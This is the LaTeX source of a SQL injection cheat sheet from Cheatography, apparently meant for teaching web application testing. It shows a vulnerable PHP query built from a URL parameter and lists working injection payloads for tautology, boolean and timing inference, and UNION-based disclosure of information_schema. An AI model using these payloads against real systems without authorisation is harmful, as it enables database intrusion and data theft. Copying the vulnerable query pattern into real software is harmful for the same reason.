\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{binca} \pdfinfo{ /Title (sql-injection.pdf) /Creator (Cheatography) /Author (binca) /Subject (SQL Injection Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{918027} \definecolor{LightBackground}{HTML}{F8F7F1} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{SQL Injection Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{binca} via \textcolor{DarkBackground}{\uline{cheatography.com/44948/cs/13343/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}binca \\ \uline{cheatography.com/binca} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 9th November, 2017.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{2} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Intro}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Perhaps the most well known web app flaw} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Easier to address from an app security perspective, but remains a common flaw.} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Apps employ relational databases for a multitude of reasons} \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{App interfaces to add, update and render data} \tn % Row Count 6 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Flaw originates from app allowing user-supplied input to be dynamically used in a SQL query} \tn % Row Count 8 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Numerous different Relational Database Management Systems in use including Oracle, MySQL, MSSQL} \tn % Row Count 10 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{1.6 cm} x{6.4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Key SQL Verbs}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{SELECT}} & Retrieves data from tables, most commonly used \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} {\bf{INSERT}} & Add data to table \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} {\bf{UPDATE}} & Modify existing data \tn % Row Count 6 (+ 2) % Row 3 \SetRowColor{white} {\bf{DELETE}} & Delete data in a table \tn % Row Count 8 (+ 2) % Row 4 \SetRowColor{LightBackground} {\bf{DROP}} & Delete a table \tn % Row Count 9 (+ 1) % Row 5 \SetRowColor{white} {\bf{UNION}} & Combine data from multiple queries \tn % Row Count 11 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{2.32 cm} x{5.68 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{SQL Query Modifiers}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{WHERE}} & Filter SQL query to apply only when a condition is met \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} {\emph{AND/OR}}* & Combine WHERE to narrow SQL query \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} {\bf{LIMIT \#1, \#2}} & Limits rows returned to \#2, many rows starting at \#1, same results with {\bf{LIMIT 2 OFFSET 1}} \tn % Row Count 8 (+ 4) % Row 3 \SetRowColor{white} {\bf{ORDER BY {[}\#{]}}} & Sort by column number \tn % Row Count 10 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{2.64 cm} x{5.36 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Important SQL Data Types}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{bool}} & Boolean True/False \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{int}} & Integer \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} {\bf{char}} & Fixed length string \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} {\bf{varchar}} & Variable length string \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{binary}}} \tn % Row Count 5 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Note: Names for data types may vary across RDBMSs} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{2.56 cm} x{5.44 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{SQL Special Chatacters}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{ ' , " }} & String delimiter \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{ ; }} & Terminates a SQL statements \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} {\bf{ -{}- , \# , /* }} & Comment delimiters \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} {\bf{ \% , * }} & Wildcard characters \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} {\bf{ || , + , " " }} & String concatenation characters \tn % Row Count 7 (+ 2) % Row 5 \SetRowColor{white} {\bf{ + , \textless{} , \textgreater{} , = }} & Mathematical operators \tn % Row Count 9 (+ 2) % Row 6 \SetRowColor{LightBackground} {\bf{ = }} & Test for equivalence \tn % Row Count 10 (+ 1) % Row 7 \SetRowColor{white} {\bf{ ( ) }} & Calling functions, sub-queries, and INSERTs \tn % Row Count 12 (+ 2) % Row 8 \SetRowColor{LightBackground} {\bf{ \%00 }} & Null byte \tn % Row Count 13 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{SQL Injection Example Code}} \tn \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Server-side PHP code taking the value of URL query parameter name as input to SQL SELECT \newline % Row Count 2 (+ 2) ` \$ sql="SELECT * FROM Users WHERE lname='\$\_GET{[}"name"{]}';" ` \newline % Row Count 4 (+ 2) The resulting query if normal input is John \newline % Row Count 5 (+ 1) URL: \seqsplit{http://url/sqli.php?name=John} \newline % Row Count 6 (+ 1) SQL Query: SELECT * FROM Users WHERE lname='John'; \newline % Row Count 8 (+ 2) Normal result. \newline % Row Count 9 (+ 1) Injected Input Query \newline % Row Count 10 (+ 1) Input is John' \newline % Row Count 11 (+ 1) URL: \seqsplit{http://url/sqli.php?name=John'} \newline % Row Count 12 (+ 1) SQL Query: SELECT * FROM Users WHERE lname='John''; \newline % Row Count 14 (+ 2) Stray ' causes error. \newline % Row Count 15 (+ 1) Inject Input Query 2 \newline % Row Count 16 (+ 1) Input is John'; -{}- \newline % Row Count 17 (+ 1) URL: http://url/sqli.php?name=John';-{}- \newline % Row Count 18 (+ 1) SQL Query: SELECT * FROM Users WHERE lname='John';-{}-'; \newline % Row Count 20 (+ 2) Normal results.% Row Count 21 (+ 1) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{' or 1=1; -{}-}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{A payload or variation upon that is found in most SQLi documentation} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{The {\bf{single quote}}* closes out any string.} \tn % Row Count 3 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{The {\bf{1=1}} changes query logic because it is always true.} \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{;-{}-}} Ends the payload completing the statement and comments out the remaining code to prevent syntax errors} \tn % Row Count 8 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Note: Some RDBMS require a space after "-{}-" comment delimiter.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{SQLi Balancing Act}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Involves finding correct prefixes, payloads and suffixes to evoke desired behavior.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Significant aspect of discovering SQLi flaws is determining reusable pieces of our injection.} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Most obvious balancing act is quotes.} \tn % Row Count 5 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{The most common data type our input will land within are strings so proper prefixes and suffixes to accommodate strings are necessary.} \tn % Row Count 8 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Example with comments: John';-{}- \newline SELECT...WHERE lname='John';-{}-'; \newline \newline Example without comments: John' OR '1'='1 \newline SELECT...WHERE lname='John' OR '1'='1';} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Balancing Column Numbers and Data Types}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{INSERT}} and {\bf{UNION}} statement require us to know the number of columns required or used, otherwise a DB Syntax Error will occur} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{INSERT}} and {\bf{UNION}} statements also require the data type associated with the columns to be compatible.} \tn % Row Count 6 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{ORDER BY {[}\#{]}}} is another option where the number is incrementally increased until an error is thrown.} \tn % Row Count 9 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Note: Numbers and strings are typically compatible.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Discovery of SQLi}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Input locations that leverage/interact with backend DB such as login functionality.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{HTTP Request portions that are common input locations: \{\{nl\}\} {\bf{GET URL query parameters}} \{\{nl\}\} {\bf{POST payload}} \{\{nl\}\} {\bf{HTTP COOKIE}} \{\{nl\}\} {\bf{HTTP User-agent}}} \tn % Row Count 6 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{HTTP COOKIE}} and {\bf{User-agent}} are more likely to be blind.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Classes of SQLi}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{One vulnerability encountered in a variety of ways} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Simplest categorization is blind versus visible, but there is spectrum.} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{In-Band/Inline SQLi}} is a flaw that allows us to see the result of our injection. They are easier to discover and exploit.} \tn % Row Count 6 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{Blind SQLi}} is the same vulnerability but with no visible response.} \tn % Row Count 8 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.2 cm} x{4.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Error Messages}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{Database Error Messages}} & Not only hint at the presence of SQLi but may guide us in crafting input for exploitation. If you see {\bf{database error messages}} it is NOT blind SQLI \tn % Row Count 7 (+ 7) % Row 1 \SetRowColor{white} {\bf{Custom Error Messages}} & Can require a different approach because the error will not indicate if the input is being interpreted. \tn % Row Count 12 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{1.368 cm} x{1.368 cm} x{4.864 cm} } \SetRowColor{DarkBackground} \mymulticolumn{3}{x{8.4cm}}{\bf\textcolor{white}{Equivalent String Injections}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{Prefix}} & {\bf{Suffix}} & {\bf{Note}} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} {\bf{John'}} & {\bf{;\#}} & Commenting \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} {\bf{John'}} & {\bf{;-{}-}} & Commenting \tn % Row Count 6 (+ 2) % Row 3 \SetRowColor{white} {\bf{ Jo'/* }} & {\bf{ */'hn }} & Inline Commenting \tn % Row Count 8 (+ 2) % Row 4 \SetRowColor{LightBackground} {\bf{Jo'}} & {\bf{'hn}} & Concatenation (with or without spaces) \tn % Row Count 10 (+ 2) % Row 5 \SetRowColor{white} {\bf{Jo'|}} & {\bf{ |'hn}} & Concatenation \tn % Row Count 12 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}---} \SetRowColor{LightBackground} \mymulticolumn{3}{x{8.4cm}}{Comment delimiters (-{}-, /**/, \#) can allow injections to succeed that would otherwise fail. \newline The -{}- and \# are useful SQL suffixes. \newline Injecting into the middle of a SQL statement/query will not allow us to alter the rest of the SQL statement but it will show us if our input is being interpreted on the backend when we experience custome error messages (Blind SQLi).} \tn \hhline{>{\arrayrulecolor{DarkBackground}}---} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{6.32 cm} p{1.68 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Binary/Boolean Inference Testing}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{John' AND 1;\#}} & True \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{John' AND 1=1;\#}} & True \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} {\bf{John' AND 0;\#}} & False \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} {\bf{John' AND 1=0;\#}} & False \tn % Row Count 4 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{If it evaluates to True (AND 1=1) or False (AND 1=0) \newline Prefix: Dent' AND \newline Evaluates: substr((select table\_name from \seqsplit{information\_schema.tables} limit 1,),1,1) \textgreater{} "a" \newline Suffix: ;\#} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Blind Timing Inferences}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{When there is no discernible output or errors the use of timing-based inference is a viable option.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Relies on responsiveness of app for the inference by artificially inducing a delay when a condition evaluates.} \tn % Row Count 5 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Example:\{\{nl\}\} {\bf{Sleep(10) - MySQL}} \{\{nl\}\} {\bf{ WAITFOR DELAY '0:0:10' - MSSQL}}} \tn % Row Count 7 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Out-of-Band SQLi}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{No errors messages} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{No visible responses} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{No boolean/inference opportunities without or without timing} \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Requires an alternative communication channel to discover or exploit these flaws} \tn % Row Count 6 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Out-of-Band Channels may provide for faster ex-filtration of some flaws susceptible to inference techniques. Typically leverages HTTP or DNS to tunnel communications back to attacker controlled server} \tn % Row Count 11 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Query Disclosure}} \tn \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{UNION SELECT}} is used to disclose the vulnerable query we are injecting into. \newline % Row Count 2 (+ 2) Payload: \newline % Row Count 3 (+ 1) John' UNION SELECT '1','2','3', info FROM \seqsplit{information\_schema.processlist;\#} \newline % Row Count 5 (+ 2) Results: \newline % Row Count 6 (+ 1) SELECT * FROM Customers WHERE lname='John' UNION SELECT '1','2','3'', info FROM \seqsplit{information\_schema.processlist;\#'}% Row Count 9 (+ 3) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}